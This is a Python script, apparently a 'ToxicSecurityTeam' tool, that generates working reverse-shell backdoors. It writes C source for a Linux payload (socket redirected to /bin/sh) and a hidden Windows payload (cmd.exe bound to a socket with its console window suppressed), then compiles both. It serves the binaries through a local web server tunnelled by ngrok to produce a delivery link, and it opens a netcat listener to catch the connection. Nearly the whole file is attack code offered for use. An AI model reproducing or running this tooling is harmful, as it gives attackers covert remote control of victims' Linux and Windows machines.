from subprocess import check_output
from time import sleep
import os,sys,time,datetime,colorama
import http.server
import socket
import re
time.sleep(0.01)
os.system("clear")
black="\033[0;30m"        # Black
red="\033[0;31m"          # Red
green="\033[0;32m"        # Green
yellow="\033[0;33m"       # Yellow
blue="\033[0;34m"         # Blue
purple="\033[0;35m"       # Purple
cyan="\033[0;36m"         # Cyan
white="\033[0;37m"        # White
os.system("clear")
os.system("lolcat banner")
time.sleep(0)
os.system("clear")
def main():

    print ("""



\033[1;96m
 â–ˆâ–ˆâ–ˆâ–ˆâ–ˆâ–ˆâ–ˆâ–ˆâ–ˆâ–ˆâ–ˆ                     â–ˆâ–ˆâ–ˆâ–ˆâ–ˆ      â–ˆâ–ˆâ–ˆâ–ˆâ–ˆ   â–ˆâ–ˆâ–ˆâ–ˆâ–ˆ   â–ˆâ–ˆâ–ˆâ–ˆâ–ˆâ–ˆâ–ˆâ–ˆâ–ˆ            â–ˆâ–ˆâ–ˆâ–ˆâ–ˆ     
â–‘â–‘â–ˆâ–ˆâ–ˆâ–‘â–‘â–‘â–‘â–‘â–ˆâ–ˆâ–ˆ                   â–‘â–‘â–ˆâ–ˆâ–ˆ      â–‘â–‘â–ˆâ–ˆâ–ˆ   â–‘â–‘â–ˆâ–ˆâ–ˆ   â–ˆâ–ˆâ–ˆâ–‘â–‘â–‘â–‘â–‘â–ˆâ–ˆâ–ˆ          â–‘â–‘â–ˆâ–ˆâ–ˆ      
 â–‘â–ˆâ–ˆâ–ˆ    â–‘â–ˆâ–ˆâ–ˆ  â–ˆâ–ˆâ–ˆâ–ˆâ–ˆâ–ˆ    â–ˆâ–ˆâ–ˆâ–ˆâ–ˆâ–ˆ  â–‘â–ˆâ–ˆâ–ˆ â–ˆâ–ˆâ–ˆâ–ˆâ–ˆ â–‘â–ˆâ–ˆâ–ˆ    â–‘â–ˆâ–ˆâ–ˆ  â–‘â–ˆâ–ˆâ–ˆ    â–‘â–ˆâ–ˆâ–ˆ   â–ˆâ–ˆâ–ˆâ–ˆâ–ˆâ–ˆ  â–‘â–ˆâ–ˆâ–ˆ â–ˆâ–ˆâ–ˆâ–ˆâ–ˆ
\033[1;97m â–‘â–ˆâ–ˆâ–ˆâ–ˆâ–ˆâ–ˆâ–ˆâ–ˆâ–ˆâ–ˆ  â–‘â–‘â–‘â–‘â–‘â–ˆâ–ˆâ–ˆ  â–ˆâ–ˆâ–ˆâ–‘â–‘â–ˆâ–ˆâ–ˆ â–‘â–ˆâ–ˆâ–ˆâ–‘â–‘â–ˆâ–ˆâ–ˆ  â–‘â–ˆâ–ˆâ–ˆâ–ˆâ–ˆâ–ˆâ–ˆâ–ˆâ–ˆâ–ˆâ–ˆ  â–‘â–ˆâ–ˆâ–ˆâ–ˆâ–ˆâ–ˆâ–ˆâ–ˆâ–ˆâ–ˆâ–ˆ  â–ˆâ–ˆâ–ˆâ–‘â–‘â–ˆâ–ˆâ–ˆ â–‘â–ˆâ–ˆâ–ˆâ–‘â–‘â–ˆâ–ˆâ–ˆ 
 â–‘â–ˆâ–ˆâ–ˆâ–‘â–‘â–‘â–‘â–‘â–ˆâ–ˆâ–ˆ  â–ˆâ–ˆâ–ˆâ–ˆâ–ˆâ–ˆâ–ˆ â–‘â–ˆâ–ˆâ–ˆ â–‘â–‘â–‘  â–‘â–ˆâ–ˆâ–ˆâ–ˆâ–ˆâ–ˆâ–‘   â–‘â–ˆâ–ˆâ–ˆâ–‘â–‘â–‘â–‘â–‘â–ˆâ–ˆâ–ˆ  â–‘â–ˆâ–ˆâ–ˆâ–‘â–‘â–‘â–‘â–‘â–ˆâ–ˆâ–ˆ â–‘â–ˆâ–ˆâ–ˆ â–‘â–‘â–‘  â–‘â–ˆâ–ˆâ–ˆâ–ˆâ–ˆâ–ˆâ–‘  
 â–‘â–ˆâ–ˆâ–ˆ    â–‘â–ˆâ–ˆâ–ˆ â–ˆâ–ˆâ–ˆâ–‘â–‘â–ˆâ–ˆâ–ˆ â–‘â–ˆâ–ˆâ–ˆ  â–ˆâ–ˆâ–ˆ â–‘â–ˆâ–ˆâ–ˆâ–‘â–‘â–ˆâ–ˆâ–ˆ  â–‘â–ˆâ–ˆâ–ˆ    â–‘â–ˆâ–ˆâ–ˆ  â–‘â–ˆâ–ˆâ–ˆ    â–‘â–ˆâ–ˆâ–ˆ â–‘â–ˆâ–ˆâ–ˆ  â–ˆâ–ˆâ–ˆ â–‘â–ˆâ–ˆâ–ˆâ–‘â–‘â–ˆâ–ˆâ–ˆ 
 â–ˆâ–ˆâ–ˆâ–ˆâ–ˆâ–ˆâ–ˆâ–ˆâ–ˆâ–ˆâ–ˆ â–‘â–‘â–ˆâ–ˆâ–ˆâ–ˆâ–ˆâ–ˆâ–ˆâ–ˆâ–‘â–‘â–ˆâ–ˆâ–ˆâ–ˆâ–ˆâ–ˆ  â–ˆâ–ˆâ–ˆâ–ˆ â–ˆâ–ˆâ–ˆâ–ˆâ–ˆ â–ˆâ–ˆâ–ˆâ–ˆâ–ˆ   â–ˆâ–ˆâ–ˆâ–ˆâ–ˆ â–ˆâ–ˆâ–ˆâ–ˆâ–ˆ   â–ˆâ–ˆâ–ˆâ–ˆâ–ˆâ–‘â–‘â–ˆâ–ˆâ–ˆâ–ˆâ–ˆâ–ˆ  â–ˆâ–ˆâ–ˆâ–ˆ â–ˆâ–ˆâ–ˆâ–ˆâ–ˆ
\033[1;94mâ–‘â–‘â–‘â–‘â–‘â–‘â–‘â–‘â–‘â–‘â–‘   â–‘â–‘â–‘â–‘â–‘â–‘â–‘â–‘  â–‘â–‘â–‘â–‘â–‘â–‘  â–‘â–‘â–‘â–‘ â–‘â–‘â–‘â–‘â–‘ â–‘â–‘â–‘â–‘â–‘   â–‘â–‘â–‘â–‘â–‘ â–‘â–‘â–‘â–‘â–‘   â–‘â–‘â–‘â–‘â–‘  â–‘â–‘â–‘â–‘â–‘â–‘  â–‘â–‘â–‘â–‘ â–‘â–‘â–‘â–‘â–‘ 
\033[48;5;0;38;5;20mâ”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”
                                 \033[48;5;0;38;5;48m  ğ“ğğ—ğˆğ‚-ğ’ğ„ğ‚ğ”ğ‘ğˆğ“ğ˜-ğ“ğ„ğ€ğŒ 
\033[48;5;0;38;5;20mâ”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â” """)
def banner():
    print ("""\033[48;5;0;38;5;48m
  â”â”â”â”â”â”“â”â”â”â”â”“â”â”â”“â”â”â”“â”â”â”â”“â”â”â”â”â”“ â”â”â”â”â”“â”â”â”â”â”“â”â”â”â”“â”â”â”â”â”“
  â”ƒâ”â”“â”â”“â”ƒâ”ƒâ”â”â”“â”ƒâ”—â”“â”—â”›â”â”›â”—â”«â”£â”›â”ƒâ”â”â”“â”ƒ â”ƒâ”â”â”“â”ƒâ”ƒâ”â”â”“â”ƒâ”—â”«â”£â”›â”ƒâ”â”â”â”›
  â”—â”›â”ƒâ”ƒâ”—â”›â”ƒâ”ƒâ”€â”ƒâ”ƒâ”€â”—â”“â”â”›â”€â”€â”ƒâ”ƒâ”€â”ƒâ”ƒâ”€â”—â”› â”ƒâ”ƒâ”€â”ƒâ”ƒâ”ƒâ”—â”â”›â”ƒâ”€â”ƒâ”ƒâ”€â”ƒâ”—â”â”â”“
  â”€â”€â”ƒâ”ƒâ”€â”€â”ƒâ”ƒâ”€â”ƒâ”ƒâ”€â”â”›â”—â”“â”€â”€â”ƒâ”ƒâ”€â”ƒâ”ƒâ”€â”â”“ â”ƒâ”—â”â”›â”ƒâ”ƒâ”â”“â”â”›â”€â”ƒâ”ƒâ”€â”ƒâ”â”â”â”›
  â”€â”€â”ƒâ”ƒâ”€â”€â”ƒâ”—â”â”›â”ƒâ”â”›â”â”“â”—â”“â”â”«â”£â”“â”ƒâ”—â”â”›â”ƒ â”ƒâ”â”â”“â”ƒâ”ƒâ”ƒâ”ƒâ”—â”“â”â”«â”£â”“â”ƒâ”ƒ
  â”€â”€â”—â”›â”€â”€â”—â”â”â”â”›â”—â”â”›â”—â”â”›â”—â”â”â”›â”—â”â”â”â”› â”—â”›â”â”—â”›â”—â”›â”—â”â”›â”—â”â”â”›â”—â”›
\033[48;5;0;38;5;20mâ”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â” 
    \033[1;97m
    {} \033[1;90m-- --=> \033[1;94m[ \033[1;97m01 \033[1;94m] \033[1;91m~ \033[48;5;0;38;5;49mLinux \033[1;97m
    {} \033[1;90m-- --=> \033[1;94m[ \033[1;97m02 \033[1;94m] \033[1;91m~ \033[48;5;0;38;5;49mWindows \033[1;97m
    {} \033[1;90m-- --=> \033[1;94m[ \033[1;97m03 \033[1;94m] \033[1;91m~ \033[48;5;0;38;5;49mListening_Connection \033[1;97m
    {} \033[1;90m-- --=> \033[1;94m[ \033[1;97m04 \033[1;94m] \033[1;91m~ \033[48;5;0;38;5;49mAbout \033[1;97m
    {} \033[1;90m-- --=> \033[1;94m[ \033[1;97m00 \033[1;94m] \033[1;91m~ \033[48;5;0;38;5;49mExit
\033[48;5;0;38;5;20mâ”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”
""")
    
    options = input( "\033[1;94mâ•­â”â”¨\033[48;5;0;38;5;48mğˆğğğ”ğ“ ğ‚ğ‡ğğˆğ‚ğ„ ğğğ“ğˆğğ\033[1;94mâ” â”\033[1;92mâ‰»â‰»â‰»â‰»   \n\033[1;94mâ•°â”â”\033[1;96mâ‰»â‰»â‰»â‰»\033[48;5;0;38;5;48m")
    print("\033[48;5;0;38;5;20mâ”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”")

#linux		
    if(options == '1'):

        host = input("\n\033[1;94mâ•­â”â”¨\033[1;97mENTER IP\033[1;94mâ” â”\033[1;92mâ‰»â‰»â‰»â‰»   \n\033[1;94mâ•°â”â”\033[1;96mâ‰»â‰»â‰»â‰»\033[48;5;0;38;5;48m")
        print("\033[48;5;0;38;5;20mâ”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”")
        port = input("\n\033[1;94mâ•­â”â”¨\033[1;97mENTER PORT\033[1;94mâ” â”\033[1;92mâ‰»â‰»â‰»â‰»   \n\033[1;94mâ•°â”â”\033[1;96mâ‰»â‰»â‰»â‰»\033[48;5;0;38;5;165m")
        print("\033[48;5;0;38;5;20mâ”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”")
        linux_shell(host, port)
        os.system("gcc .linux.c -o ToxicSecurityTeam-BackDoorLinux -pthread && rm -rf .linux.c")
        os.system("chmod +x ToxicSecurityTeam-BackDoorLinux")
        print("\n\033[1;36mFile Saved > \033[1;39mTOxicSecurityTeam-BackDoorLinux")
        #http.server 80
        os.system("python3 -m http.server 80 > .server 2> /dev/null &")          
        os.system("chmod +x ngrok")
        name1="/ToxicSecurityTeam-BackdoorLinux"
        portN=80
        os.system("./ngrok http {} > /dev/null &".format(portN))
        sleep(8)
        os.system('curl -s -N http://127.0.0.1:4040/api/tunnels | grep "https://[0-9a-z]*\.ngrok.io" -oh > link2.url')
        urlFile = open('link2.url', 'r')
        url = urlFile.read()
        urlFile.close()
        if re.match("https://[0-9a-z]*\.ngrok.io", url) != None:
          print("\n\033[1;94mâ•­â”â”¨\033[1;97mENTER-LINK\033[1;94mâ” â”\033[1;92mâ‰»â‰»â‰»â‰»   \n\033[1;94mâ•°â”â”\033[1;96mâ‰»â‰»â‰»â‰»\033[48;5;0;38;5;48m",url+name1)
          print("\033[48;5;0;38;5;20mâ”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”")
   
        print(" ")
        
#windows
    if(options == '2'):
  

        host = input( "\n\033[1;94mâ•­â”â”¨\033[1;97mENTER IP\033[1;94mâ” â”\033[1;92mâ‰»â‰»â‰»â‰»   \n\033[1;94mâ•°â”â”\033[1;96mâ‰»â‰»â‰»â‰»\033[48;5;0;38;5;48m")
        print("\033[48;5;0;38;5;20mâ”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”")
        port = input("\n\033[1;94mâ•­â”â”¨\033[1;97mENTER PORT\033[1;94mâ” â”\033[1;92mâ‰»â‰»â‰»â‰»   \n\033[1;94mâ•°â”â”\033[1;96mâ‰»â‰»â‰»â‰»\033[48;5;0;38;5;48m")
        print("\033[48;5;0;38;5;20mâ”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”")
        windows_reverse(host, port)
        os.system("/usr/bin/i686-w64-mingw32-gcc .windows.c -o ToxicSecurityTeam-BackDoorWindows.exe -lws2_32 && rm -rf .windows.c")
        print("\n\033[1;36mFile Saved > \033[1;39mTOxiCSecurityTeam-BackDoorWindows")

        #http.server 80
        os.system("python3 -m http.server 80 > .server 2> /dev/null &")          
        os.system("chmod +x ngrok")
        name2="/ToxicSecurityTeam-BackDoorWindows.exe"
        portN=80
        os.system("./ngrok http {} > /dev/null &".format(portN))
        sleep(8)
        os.system('curl -s -N http://127.0.0.1:4040/api/tunnels | grep "https://[0-9a-z]*\.ngrok.io" -oh > link2.url')
        urlFile = open('link2.url', 'r')
        url = urlFile.read()
        urlFile.close()
        if re.match("https://[0-9a-z]*\.ngrok.io", url) != None:
          print("\n\033[1;94mâ•­â”â”¨\033[1;97mENTER-LINK\033[1;94mâ” â”\033[1;92mâ‰»â‰»â‰»â‰»   \n\033[1;94mâ•°â”â”\033[1;96mâ‰»â‰»â‰»â‰»\033[48;5;0;38;5;48m",url+name2)
          print("\033[48;5;0;38;5;20mâ”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”")
   
        print(" ")
    
    if(options == '3'):         
        port=input("\n\033[1;94mâ•­â”â”¨\033[1;97mENTER PORT\033[1;94mâ” â”\033[1;92mâ‰»â‰»â‰»â‰»   \n\033[1;94mâ•°â”â”\033[1;96mâ‰»â‰»â‰»â‰»\033[48;5;0;38;5;48m")
        print("\033[48;5;0;38;5;20mâ”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”\n\033[48;5;0;38;5;48mPlease Wait Connection ...\n")
        os.system("nc -l %s" %port)
        print("\033[48;5;0;38;5;20mâ”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”")
    if(options == '4'):
    	os.system('clear')
    	os.system('lolcat banner')
    	os.system('xdg-open --view https://www.facebook.com/ArifHasNaiN.official')
    	time.sleep(4)

    if(options == '00'):
        sys.exit()
        os.system("fuser -k -n tcp 80") # kill port 80   
        
 
    else :
        banner()

def linux_shell(host, port):
    
    with open(".linux.c", "w") as file:
        file.write('''
#include <stdio.h>
#include <unistd.h>
#include <sys/socket.h>
#include <arpa/inet.h>
 
int main (int argc, char **argv)
{
  int scktd;
  struct sockaddr_in client;
 
  client.sin_family = AF_INET;
  client.sin_addr.s_addr = inet_addr("%s");
  client.sin_port = htons(%s);
  scktd = socket(AF_INET,SOCK_STREAM,0);
  connect(scktd,(struct sockaddr *)&client,sizeof(client));
  dup2(scktd,0); // STDIN
  dup2(scktd,1); // STDOUT
  dup2(scktd,2); // STDERR
  execl("/bin/sh","sh","-i",NULL,NULL);
  return 0;
}
''' % (host, port))

 
def windows_reverse(host, port):
    with open(".windows.c", "w") as file:
        file.write('''
#include <winsock2.h>
#include <stdio.h>
#define _WINSOCK_DEPRECATED_NO_WARNINGS
#pragma comment(lib,"ws2_32")
  WSADATA wsaData;
  SOCKET Winsock;
  SOCKET Sock;
  struct sockaddr_in hax;
  char ip_addr[16];
  STARTUPINFO ini_processo;
  PROCESS_INFORMATION processo_info;
//int main(int argc, char *argv[])
int WINAPI WinMain (HINSTANCE hInstance, HINSTANCE hPrevInstance, PSTR szCmdParam, int iCmdShow)
{
    FreeConsole();
    WSAStartup(MAKEWORD(2,2), &wsaData);
    Winsock=WSASocket(AF_INET,SOCK_STREAM,IPPROTO_TCP,NULL,(unsigned int)NULL,(unsigned int)NULL);
                
    struct hostent *host;
    host = gethostbyname("'''+host+'''");
    strcpy(ip_addr, inet_ntoa(*((struct in_addr *)host->h_addr)));
    hax.sin_family = AF_INET;
    hax.sin_port = htons(atoi("'''+port+'''"));
    hax.sin_addr.s_addr = inet_addr(ip_addr);
    WSAConnect(Winsock,(SOCKADDR*)&hax,sizeof(hax),NULL,NULL,NULL,NULL);
    memset(&ini_processo,0,sizeof(ini_processo));
    ini_processo.cb=sizeof(ini_processo);
    ini_processo.dwFlags=STARTF_USESTDHANDLES;
    ini_processo.hStdInput = ini_processo.hStdOutput = ini_processo.hStdError = (HANDLE)Winsock;
    CreateProcess(NULL,"cmd.exe",NULL,NULL,TRUE,CREATE_NO_WINDOW,NULL,NULL,&ini_processo,&processo_info);
}
''')

if __name__ == '__main__':
 main()

banner()
